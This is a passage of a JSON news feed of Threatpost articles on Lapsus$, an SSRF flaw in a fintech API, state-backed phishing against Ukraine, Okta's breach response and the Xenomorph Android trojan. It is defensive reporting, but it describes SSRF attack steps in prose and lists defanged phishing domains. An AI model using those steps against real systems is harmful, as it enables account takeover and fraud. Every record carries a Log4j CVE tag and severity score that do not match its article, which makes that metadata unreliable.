[for its December attack](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) on the Brazil Ministry of Health that took down several online entities, successfully wiping out information on citizens\u2019 COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.\n\nIn January, Lapsus$ also [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media giant Impresa.\n\nLapsus$ also recently released what is purportedly a [massive dump](<https://betanews.com/2022/03/06/lapsus-hackers-leak-samsung-source-code-and-massive-data-dump-from-security-breach/>) of proprietary source code [stolen](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>) from Samsung, vx-underground [reported](<https://twitter.com/vxunderground/status/1499882337957515274>).\n\n030722 16:06 UPDATE: Added commentary from Casey Bisson and Mike Parkin.\n\n_Register Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is \nPUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who is the requesting user and what permissions he has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for a SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the code instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at one of its service providers and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an[ FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel \n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. \n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to one of Sitel\u2019s customer support engineer\u2019s Okta account. Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, should, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyber attacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201d Okta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in[ its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. \u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. \n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aim to identify key facts over what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material.\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u201d Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u201cgod-like access\u201d to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. The goal of course is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE!\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph as still under development. However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification-interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from the victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality **\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibilty events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22123754/Alien-xenomorph-scaled-e1645551511463.jpeg>)\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. Based on what targeted applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable intercept notifications, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendent of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThese include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph uses state-tracking through the use of the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. \u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 